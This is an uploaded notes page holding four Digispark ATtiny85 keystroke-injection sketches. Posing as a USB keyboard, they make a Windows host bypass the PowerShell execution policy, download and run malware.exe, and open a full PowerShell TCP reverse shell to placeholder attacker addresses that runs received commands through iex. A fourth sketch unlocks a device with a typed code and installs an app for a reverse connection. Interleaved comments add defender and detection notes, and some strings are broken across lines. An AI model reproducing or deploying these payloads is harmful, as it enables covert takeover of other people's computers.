
Notes 20230424202058

This document contains code for an ATtiny85 microcontroller that uses the DigiKeyboard library to simulate keyboard input on a target computer. The first sketch flashes an LED, opens the command prompt, sets the PowerShell execution policy to Bypass for the current user, downloads malware from a URL, and executes it, all by simulating keystrokes: the Windows key with R, typed commands, and Enter. The document also contains similar sketches that type a reverse shell payload into PowerShell to establish a connection back to the attacker.

Uploaded by

Bharath

04.

24 8:17 PM
Digispark ATtiny85 microcontroller code
#include <DigiKeyboard.h>

// One-time board setup for the first sketch: configures pin 1 as an output
// (the loop below toggles it as a status LED) and then pauses so the host has
// time to enumerate the board as a USB keyboard before any keys are sent.
void setup() {
  const int kStatusLedPin = 1;
  const unsigned long kHostEnumerationWaitMs = 2000;

  pinMode(kStatusLedPin, OUTPUT);
  delay(kHostEnumerationWaitMs);
}

// Repeating keystroke-injection routine. The board presents itself to the host
// as a USB keyboard and types a fixed command sequence into whatever session
// is unlocked and has focus.
//
// Sequence as written: blink the LED on pin 1, send key code 0, send the left
// GUI key and then 'r', type "cmd", then type three PowerShell one-liners
// (execution policy set to Bypass for CurrentUser, a download to a fixed path
// under C:\Users\User, Start-Process on that file), blink the LED again and
// wait 180000 ms before the next pass.
//
// Defender notes:
//  - Every command runs as the logged-in user through ordinary shells, so
//    process-creation auditing with command lines (Windows event 4688 or an
//    equivalent EDR feed) and PowerShell script-block logging (event 4104)
//    record each typed line.
//  - A new HID keyboard attaching, followed within seconds by the Run dialog
//    spawning cmd.exe and powershell.exe, is the correlation worth alerting on.
//  - Device-control policy that restricts unapproved USB HID devices, and
//    locking unattended sessions, remove the precondition for this sequence.
//  - The URL in the download line appears to be an example.com placeholder
//    that picked up a link-wrapper prefix during page extraction; it is not a
//    usable indicator.
//  - The string literals below are split across lines by the page extraction
//    and are reproduced exactly as printed.
void loop() {
// flash LED to indicate start of keystrokes
digitalWrite(1, HIGH);
delay(500);
digitalWrite(1, LOW);
delay(500);

// type out keystrokes


DigiKeyboard.sendKeyStroke(0);
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_LEFT_GUI);
DigiKeyboard.sendKeyStroke('r');
delay(1000);
DigiKeyboard.println("cmd");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
// Typed command 1: per-user execution policy change (leaves a persistent
// setting behind for the current user, which is itself an audit signal).
DigiKeyboard.println("powershell -Command \"Set-ExecutionPolicy Bypass -Scope
CurrentUser -Force\" ");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
// Typed command 2: download to a hard-coded path in the profile of a user
// literally named "User".
DigiKeyboard.println("powershell -Command \"wget http://example.com/malware.exe -
OutFile C:\\Users\\User\\malware.exe\"");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);
// Typed command 3: launch the downloaded file from that same path.
DigiKeyboard.println("powershell -Command \"Start-Process C:\\Users\\User\\
malware.exe\"");
delay(1000);
DigiKeyboard.sendKeyStroke(KEY_RETURN);
delay(1000);

// flash LED to indicate end of keystrokes


digitalWrite(1, HIGH);
delay(500);
digitalWrite(1, LOW);
delay(500);

// delay for a few minutes before repeating keystrokes


delay(180000);
}

#include "DigiKeyboard.h"

// The second sketch does no one-time configuration; all activity is in loop().
void setup() {
  // intentionally left blank
}
// Keystroke-injection routine for the second sketch. It sends key code 0, then
// KEY_R with the left GUI modifier, waits 500 ms, types one PowerShell command
// line and sends Return. There is no long pause at the end, so the sequence is
// typed again each time the Arduino runtime re-enters loop().
//
// The typed command starts PowerShell with -nop -w hidden and opens a TCP
// client to the placeholders 'YOUR_IP_ADDRESS' / YOUR_PORT; whatever arrives
// on that stream is passed to iex and the output is written back.
//
// Defender notes:
//  - powershell.exe launched from the Run dialog with -nop and -w hidden, and
//    a command line containing System.Net.Sockets.TCPClient together with iex,
//    is a high-signal match for command-line and script-block logging rules.
//  - The resulting traffic is an outbound TCP connection owned by
//    powershell.exe; egress filtering and per-process network telemetry are
//    the network-side controls.
//  - AMSI-aware endpoint protection and PowerShell Constrained Language Mode
//    limit what a typed one-liner like this can do.
//  - The string literal is split across lines by the page extraction and is
//    reproduced exactly as printed.
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell -nop -w hidden -c $client = New-Object
System.Net.Sockets.TCPClient('YOUR_IP_ADDRESS',YOUR_PORT);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,
0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();");
DigiKeyboard.sendKeyStroke(KEY_RETURN);
DigiKeyboard.delay(500);
}

#include "DigiKeyboard.h"

// One-time setup for the third sketch: pin 3 becomes an input with the
// internal pull-up enabled (loop() polls it as the trigger), then the board
// waits so the host can finish recognising it as a keyboard.
void setup() {
  const int kTriggerPin = 3;
  const long kHostEnumerationWaitMs = 5000;

  pinMode(kTriggerPin, INPUT_PULLUP);
  DigiKeyboard.delay(kHostEnumerationWaitMs);
}

// Trigger-gated keystroke injection for the third sketch. Nothing is typed
// unless pin 3 reads LOW; setup() enables the pull-up on that pin, so it
// presumably reads LOW only when something external pulls it to ground
// (button or jumper - not shown on the page).
//
// When triggered it sends key code 0, sends KEY_R, types "powershell" and
// Enter, then types a PowerShell script that opens a TCP client to the
// placeholders 'ATTACKER_IP_ADDRESS' / ATTACKER_PORT_NUMBER, passes received
// data to iex and writes the output back, followed by Enter.
//
// Defender notes:
//  - Here the script is typed into an interactive PowerShell window instead
//    of being passed on a command line, so process command-line logging shows
//    only "powershell"; script-block logging (event 4104) and console
//    transcription are what capture the typed body.
//  - The outbound TCP connection from powershell.exe and the HID-attach event
//    remain the same detection points as for any keystroke-injection device.
//  - The string literal and the trailing comment after it are split across
//    lines by the page extraction and are reproduced exactly as printed.
void loop() {
if (digitalRead(3) == LOW) {
DigiKeyboard.sendKeyStroke(0); // Send key code 0
DigiKeyboard.sendKeyStroke(KEY_R); // Press the R key
DigiKeyboard.delay(1000);
DigiKeyboard.print("powershell"); // Type out "powershell"
DigiKeyboard.sendKeyStroke(KEY_ENTER); // Press the Enter key
DigiKeyboard.delay(1000);
DigiKeyboard.print("$client = New-Object
System.Net.Sockets.TCPClient('ATTACKER_IP_ADDRESS',ATTACKER_PORT_NUMBER);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,
0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();"); //
Inject the reverse shell payload
DigiKeyboard.sendKeyStroke(KEY_ENTER); // Press the Enter key
DigiKeyboard.delay(1000);
}
}

#include "DigiKeyboard.h"

// One-shot scripted keystroke sequence for the fourth sketch. Everything runs
// once from setup(); loop() is empty.
//
// As written it waits 5 s, sends a series of key strokes and typed strings
// separated by fixed delays, and finishes. All typed values are placeholders
// ("Your unlock code", "Your download link", "Your application name",
// "Your permission code") except the literal "google.com/chrome".
//
// NOTE(review): the per-line comments are the original author's description
// of intent. They are not verified against the DigiKeyboard API here, and the
// wrapped comment tails are left exactly as the page printed them.
//
// Defender notes:
//  - The sequence is blind: it relies on fixed delays and on the operator
//    already knowing the device unlock code, which it types in clear text.
//    Strong, non-shared unlock credentials remove that precondition.
//  - The later steps depend on the user being allowed to download and install
//    an arbitrary application and to dismiss an install warning. Application
//    allow-listing, reputation-based install blocking, and standard-user (not
//    administrator) sessions are the relevant controls.
//  - As with the other sketches, restricting unapproved USB HID devices and
//    alerting on a new keyboard followed by rapid scripted input are the
//    device-level controls.
void setup() {
DigiKeyboard.delay(5000); // Wait for 5 seconds before starting
DigiKeyboard.sendKeyStroke(0); // Wake up device if it's sleeping
DigiKeyboard.delay(500); // Wait for device to wake up
DigiKeyboard.sendKeyStroke(KEY_LEFT_GUI); // Press and hold the Windows key
DigiKeyboard.sendKeyPress('l'); // Press the letter 'l'
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Release the Windows key and press
Enter
DigiKeyboard.delay(500); // Wait for the lock screen to appear
DigiKeyboard.print("Your unlock code"); // Type in the unlock code
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to unlock the device
DigiKeyboard.delay(1000); // Wait for device to unlock
DigiKeyboard.print("google.com/chrome"); // Type in the URL for Google Chrome
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to open the browser
DigiKeyboard.delay(5000); // Wait for the browser to open
DigiKeyboard.print("Your download link"); // Type in the URL for the download
link
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to start the download
DigiKeyboard.delay(10000); // Wait for download to complete
DigiKeyboard.sendKeyStroke(KEY_LEFT_ALT, KEY_Y); // Press the 'Install anyway'
button
DigiKeyboard.delay(5000); // Wait for installation to complete
DigiKeyboard.print("Your application name"); // Type in the name of the
application
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to open the application
DigiKeyboard.delay(5000); // Wait for application to open
DigiKeyboard.print("Your permission code"); // Type in the permission code for
reverse connection
DigiKeyboard.sendKeyStroke(KEY_RETURN); // Press Enter to give permission for
reverse connection
}

// The fourth sketch performs its whole sequence once in setup(), so the
// repeating loop has no work to do.
void loop() {
  // intentionally idle
}
